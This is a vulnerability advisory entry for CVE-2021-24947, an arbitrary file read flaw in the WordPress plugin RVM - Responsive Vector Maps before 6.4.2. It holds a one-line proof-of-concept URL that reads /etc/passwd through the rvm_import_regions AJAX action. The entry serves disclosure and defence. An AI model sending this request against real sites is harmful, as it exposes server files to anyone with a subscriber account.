Lucene search
Krzysztof ZającWPVDB-ID:C6BB12B1-6961-40BD-9110-EDFA9EE41A18HistoryJan 06, 2022 - 12:00 a.m.
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
2022-01-0600:00:00
Krzysztof Zając
wpscan.com
7
rvm plugin
arbitrary file read
authorisation
csrf checks
parameter validation
subscriber
web server security
EPSS
0.002
Percentile
57.8%
The plugin does not have proper authorisation, CSRF checks and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user, such as subscriber, to read arbitrary files on the web server
PoC
As a subscriber, open https://example.com/wp-admin/admin-ajax.php?action=rvm_import_regions&nonce;=5&rvm;_mbe_post_id=1&rvm;_upload_regions_file_path=/etc/passwd and view the source to get the data
Related
wpexploit
wpexploit
RVM - Responsive Vector Maps < 6.4.2 - Subscriber+ Arbitrary File Read
2022-01-06 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-02-07 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2021-24947
2022-02-07 16:15:43
nuclei
nuclei
WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read
2022-02-08 01:07:19
patchstack
patchstack
cve
cve
CVE-2021-24947
2022-02-07 16:15:43
kitploit
kitploit
Wpgarlic - A Proof-Of-Concept WordPress Plugin Fuzzer
2022-04-25 21:30:00